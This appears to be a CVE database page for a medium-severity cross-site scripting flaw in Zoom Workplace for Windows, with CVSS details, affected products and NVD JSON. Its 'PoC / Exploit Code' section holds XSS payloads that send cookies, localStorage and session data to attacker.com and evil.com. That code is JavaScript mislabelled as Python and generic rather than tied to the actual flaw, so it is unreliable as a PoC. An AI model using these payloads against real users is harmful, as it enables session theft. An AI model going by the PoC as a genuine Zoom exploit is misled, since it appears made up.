Security Vulnerability Report
中文
CVE-2025-62482 CVSS 4.3 MEDIUM

CVE-2025-62482

Published: 2025-11-13 15:15:52
Last Modified: 2026-01-13 20:50:33

Description

Cross-site scripting in Zoom Workplace for Windows before version 6.5.10 may allow an unauthenticated user to impact integrity via network access.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:* - VULNERABLE
Zoom Workplace for Windows < 6.5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62482 PoC - Zoom Workplace XSS // This PoC demonstrates the XSS vulnerability in Zoom Workplace for Windows // Target: Zoom Workplace for Windows < 6.5.10 // Attack vector 1: Malicious meeting link const maliciousMeetingLink = "zoommtg://meeting/join?confno=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E"; // Attack vector 2: Malicious chat message content const maliciousChatPayload = "<img src=x onerror=\"fetch('https://attacker.com/steal?cookie='+document.cookie)\">"; // Attack vector 3: Malicious file share name const maliciousFileName = "<script>document.location='https://evil.com/log?data='+btoa(document.cookie)</script>"; // Attack vector 4: Exploit in meeting chat const exploitChat = { type: "chat", content: "<a href='javascript:fetch(\"https://attacker.com/exfil?data=\"+btoa(document.cookie))'>Click here</a>", timestamp: Date.now() }; // Auto-execution payload for demonstration const autoExecPayload = ` <script> // Steal session information const sessionData = { cookies: document.cookie, localStorage: localStorage, sessionStorage: sessionStorage, userAgent: navigator.userAgent }; // Send data to attacker server navigator.sendBeacon('https://attacker.com/collect', JSON.stringify(sessionData)); </script> `; // Display PoC information console.log('=== CVE-2025-62482 PoC ==='); console.log('Target: Zoom Workplace for Windows < 6.5.10'); console.log('Vulnerability: Cross-Site Scripting (XSS)'); console.log('CVSS Score: 4.3 (Medium)'); console.log('\nAttack Payloads Generated:'); console.log('1. Meeting Link Injection:', maliciousMeetingLink); console.log('2. Chat Message Payload:', maliciousChatPayload); console.log('3. File Name Payload:', maliciousFileName); console.log('4. Auto-exec Script:', autoExecPayload); // Recommendation: Upgrade to Zoom Workplace 6.5.10 or later

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62482", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:51.697", "lastModified": "2026-01-13T20:50:33.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting in Zoom Workplace for Windows before version 6.5.10 may allow an unauthenticated user to impact integrity via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "851C9061-1A47-4521-9FD9-9933A5A7509A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "366D7D39-E1C5-48C0-8F12-F4860FA5BD44"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25046", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}